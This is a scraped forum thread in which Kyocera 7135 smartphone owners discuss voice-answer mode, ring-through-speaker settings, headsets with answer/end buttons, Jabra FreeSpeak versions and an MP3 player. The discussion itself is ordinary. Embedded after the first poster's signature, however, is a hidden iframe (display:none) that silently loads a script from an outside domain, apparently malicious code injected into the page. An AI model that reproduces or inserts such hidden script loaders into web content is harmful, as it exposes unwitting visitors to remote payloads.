+ Reply to Thread

Ring while in "voice answer" mode?

I would be in cel phone heaven if I could do this: walk around all day with my 7135 in its holster, and the earbud dangling from my shirt - when the phone rings, put the earbud in my ear and say "yes" to answer the call. The only problem is that when the phone is in this mode, as far as I can gather, you can only hear it ring through the earbud, which I don't want to leave in my ear all the time. Is there any way of having the phone ring under this scenario? Any help would be appreciated, as I really want to love my 7135. Thanks.

Milesfnw<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I understand your grip! I have an over the ear headset and when the phone is on and the headset is in the phone will say,"Do you want to answer?"

Two things:

1. If you put the phone in "vibrate then ring" mode, you could have your earpiece out of your ear and feel the good vibrations first which will give you time to put in the earpiece. And if you are away from the phone, then it will then kick into ring mode and give you time to walk over and answer or just let it go to voicemail.

2. I have heard of some headsets that have an answer button on them so that you don't have to open the phone to answer at all. That is what I'm thinking of getting, but I would rather have an over the ear headset than an earbud. I have heard that Kyocera's stereo headphone have this feature. If someone knows for sure ... please confirm this.

Thanks!

Kyo's earbud does have the answer button on the mic. Very convenient.

GM

Yes...
    The Kyocera Stereo Headset has a Answer/Hang-up button built into the microphone.
    It works well...
    I bought mine from e3wireless on Ebay.

AJR
    I have found several headsets with answer/end button that work with the 7135. Check out my post dedicated to headsets here. If you find any others that work, please add to the thread.

Kyocera Headphones

So if I understand correctly.

Say your listening to some music on the MP3 with the phone in your holster. Phone rings .... you push the button on the microphone and are you answering the phone call?

And lets say you get another call ... if you push this button again would you "click over" to the other phone call?

And if you push this button again ... does it hang up the caller .... all without having to take the phone out of the holster?

If that is the case .... I'm going to have to get a pair of these things!

Thanks for all the help!

AJR

Re: Kyocera Headphones

Originally posted by Artkazi
    Say your listening to some music on the MP3 with the phone in your holster. Phone rings .... you push the button on the microphone and are you answering the phone call?
    Yes, if you're listening to MP3's and a call comes in, the MP3 player will stop and the phone will ring. You may have to hit the answer button on the headset twice to pick up the call.
    NOTE: This does not apply to the Jabra FreeSpeak. If you're listening to an MP3 with the FreeSpeak, it's in active mode so hitting the button will put the FreeSpeak in standby. I'll check it out tomorrow for sure.

And if you push this button again ... does it hang up the caller .... all without having to take the phone out of the holster?
    Yes, pushing the button again will hang up the call.

And lets say you get another call [while on a call]... if you push this button again would you "click over" to the other phone call?
    I just tested this on my Belkin headset, and I fear it will be the same on the FreeSpeak. If you receive another call while on a call and push the button on the headset, it will hang up both calls. So if you receive another call, you have to open the flip, press the 'send' button to switch to the other call, then press the 'send' button again to switch back to the first caller (if you need to). Then you can close the flip. When you're done with the call, you can press the button on the headset to end the call.

Well that is very helpful! I guess that makes sense. Now I haven't tryed a 3 way call on the phone yet. I'm guessing you have to find the number on the phone and push OK to start dialing. I will have to try this soon.

But the headset button sounds like the answer to my problem. I will look at the link you posted to seek a good one out.

If anyone has info on Platronics M1000 or M1500 let me know. It is the over the ear style that I like!

Thanks AJR!

BTW - If anyone has the Jabra Bluetooth headset, I had a question. Do you need to by a bluetooth card for the phone in order for it to work or is it totally wireless?

AJR
    Originally posted by Artkazi
    If anyone has info on Platronics M1000 or M1500 let me know. It is the over the ear style that I like!
    The M1000 is Bluetooth only (Like the Jabra FreeSpeak Bluetooth only version). The M1500 is like the FreeSpeak non-Bluetooth version. The M1500 is cheaper than the FreeSpeak, but just gives you wireless ability... it DOES NOT have an answer/end button. I put it on the list in the other thread, but just because it's wireless.

BTW - If anyone has the Jabra Bluetooth headset, I had a question. Do you need to by a bluetooth card for the phone in order for it to work or is it totally wireless?
    The Jabra FreeSpeak is probably the best headset (except for listening to MP3's).... but also the most expensive! Check ebay for the best price on this one! The drawbacks (cons) to the FreeSpeak are the battery life, and it can get out-of-sync occasionally (standby to active to standby mode). The synching can be fixed easily. As far as the battery life, you can get a charger for your car now (see link in my headset thread). There are 3 versions of the Jabra FreeSpeak headset:
    - The first version is for Bluetooth only phones (does not work with the 7135, even with a BlueTooth SD card due to no drivers for the phone side).
    - The second version is for most non-Bluetooth phones (except the Nokia 33xx/82xx). This is the version you want for your Kyo 7135.
    - The third version is for the non-Bluetooth Nokia 33xx/82xx phones. You can tell the difference from this one and the second version above by the headset jack. This one has 3 connector rings on the jack. The one above only has 2 connector rings.

Hope all this helps,
    AJ

I just found out a little more info on the Kyocera Headphones:

Check this out!

Original Stereo Handsfree Headset_ TXCKT10008
    _

If you have read up on the 7135 Smartphone's fantastic feature set, you know that it has an on board MP3 player. If you plan on listening to music, the Kyocera Wireless Stereo Headset is a "must" have.

The Kyocera Wireless Stereo Headset (2.5mm plug) has been specifically designed and tested with the 7135 Smartphone. The result is excellent audio quality for listening to MP3 music as well as clarity listening to callers. Standard stereo headsets (have 3.5mm plugs) and will not function properly with the 7135 Smartphone due to the complexity of the required connector.

Our Stereo headset is ultra-light and compact for ease of use. To avoid obstruction of daily activities, the right earbud wire has been lengthened to go behind the neck. A clothing clip is included for convenient microphone placement. The call button on the microphone will provide "call answer" and "call end" functions with the 7135 Smartphone.

USAGE TIPS:

* Use the phone controls to adjust the volume while using stereo headset.
    * For optimal audio performance, position microphone close to your mouth using the clothing clip included (call button should face outward).
    * To answer a call, press the call button. To end a call, press the call button again. To resume MP3, press the icon on the phone.
    * MP3 music will mute during a call.
    * While in phone mode the sound will only come through the left earbud. This is a safety feature to let people who use the headset while driving know that only one ear bud is required for calls. Wearing two ear buds while driving is illegal in many states. Driving safely should be your primary focus.

SPECIFICATIONS:

* Plug dimension: 2.5mm
    * Microphone: Omni-directional
    * Cord length: 1165 cm

Manufacturer:_ Kyocera
    Warranty:_ 1 Year

--------------------------------------------

Good to know that one earbud goes out during a phone call!

Artkazi

Re: Ring while in "voice answer" mode?

Originally posted by Milesfnw
    I would be in cel phone heaven if I could do this: walk around all day with my 7135 in its holster, and the earbud dangling from my shirt - when the phone rings, put the earbud in my ear and say "yes" to answer the call. The only problem is that when the phone is in this mode, as far as I can gather, you can only hear it ring through the earbud, which I don't want to leave in my ear all the time. Is there any way of having the phone ring under this scenario? Any help would be appreciated, as I really want to love my 7135. Thanks.

Milesfnw
    There is an easy solution to this; I can't believe no one has posted it yet. Go to Phone Preferences, and then under the first category, Accessories, check the first box that says "Play alert through speaker when headset is plugged in." This will let you hear any ringing if you have the headset out, which should let you do exactly what you wanted.

Also for those in awe at what the headset can do in terms of answering calls while listening to MP3's, keep in mind that the phone can do this: I put the phone in Voice Answer mode and trained it for "Yes," and "No," which means that when I'm jogging listening to MP3's and a call comes in, I hear a voice saying "Incoming call would you like to answer?" I say yes or no. if no, the music comes right back on. If yes, I'll do my call, and at the end, thanks to Bebop MP3 player, the music comes right back on also. I never had to touch the phone or miss a beat.

PHP Code:
    There is an easy solution to thisI can't believe no one has posted it yet. Go to Phone Preferences, and then under the first category, Accessories, check the first box that says "Play alert through speaker when headset is plugged in." This will let you hear any ringing if you have the headset out, which should let you do exactly what you wanted. 
    I'm not sure about this, but if you have the phone in this mode I think you still have to flip open the phone to take the call don't you? Otherwise how would the phone know you wanted to answer the call ..... unless you are saying you could have a answer button headset and then be able to answer the call without flipping open the phone.

That would be sweet if this works! I would test it but I don't have an answer button headset. Will someone test this out?

Thanks!

If you have it set to ring through speakers even if a headset is attached, would you be able to hear the woman asking if you want to take the call, still be able to answer yes or no once you slipped the earplug back in? Or will this void voice recognition and you'd have to flip the phone open to answer?

Thanks

Originally posted by liltiki
    If you have it set to ring through speakers even if a headset is attached, would you be able to hear the woman asking if you want to take the call, still be able to answer yes or no once you slipped the earplug back in? Or will this void voice recognition and you'd have to flip the phone open to answer?

Thanks
    If you have Voice Answer activated, and Ring External when headset is attached selected, the voice will ask twice, through the headset if you want to answer the phone, THEN the phone will start ringing externally and you will need to answer with either an answer/end buttin on the headset or by opening the flip and manually answering. And you need to be quick, since the voice answer dialog takes about three ring cycles, so you will only have one to three rings to manually answer before your call will roll to voice mail (timing depends on where in VZW's network you are, and I believe also settings on your VZW account. Can't speak for other carriers).

Alan

So what you're saying is the only way to hear the phone asking if you want to take the call, is through the earphone. Once it rings, you have to open the flip to answer... or if you have the answer end button on your earpiece.

I thought I had bought an earpiece with answer/end (jabra ear piece windup) but didn't read the small print... it doesn't work with the 7135.

Re: Re: Ring while in "voice answer" mode?

Originally posted by mghaffar
    the end, thanks to Bebop MP3 player, the music comes right back on also.

What's a Bebop MP3 player and where do I get one???

Tom
    To most people, the sky is the limit.
    To those who love flight, the sky is home

Re: Re: Re: Ring while in "voice answer" mode?

Originally posted by scout706
    What's a Bebop MP3 player and where do I get one???

Tom
    See http://www.smartphonesource.com/vbul...&threadid=6835

Currently in Beta. I believe the developer has said he has enough testers right now. It blows away the default MP3 player.

Alan

Originally posted by liltiki
    So what you're saying is the only way to hear the phone asking if you want to take the call, is through the earphone. Once it rings, you have to open the flip to answer... or if you have the answer end button on your earpiece.

I thought I had bought an earpiece with answer/end (jabra ear piece windup) but didn't read the small print... it doesn't work with the 7135.
    Alas, I was shortsighted in my original analysis and assumed the ability to press the answer button; it is true that the chance to say yes passes quickly and before any non-headset ringing. The kyo stereo headset is pretty good though, especially if you listen to MP3's. I do wish it was retractable; how is your retractable headset? I was thinking of buying a wireless but didn't think it was worth it ($180 from Jabra directly, $95 on eBay, but that's still expensive and no warranty).